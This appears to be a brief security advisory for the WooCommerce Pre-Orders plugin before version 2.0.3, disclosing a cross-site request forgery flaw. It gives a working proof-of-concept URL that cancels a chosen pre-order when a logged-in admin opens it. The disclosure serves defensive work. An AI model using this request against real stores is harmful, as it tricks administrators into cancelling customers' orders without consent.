WooCommerce Pre-Orders < 2.0.3 - Arbitrary Pre-Order Canceling via CSRF

Proof of Concept

Make a logged in admin open the URL below (42 being a pre-order to be canceled)

https://example.com/wp-admin/admin.php?page=wc_pre_orders&action=cancel_pre_order&order_id=42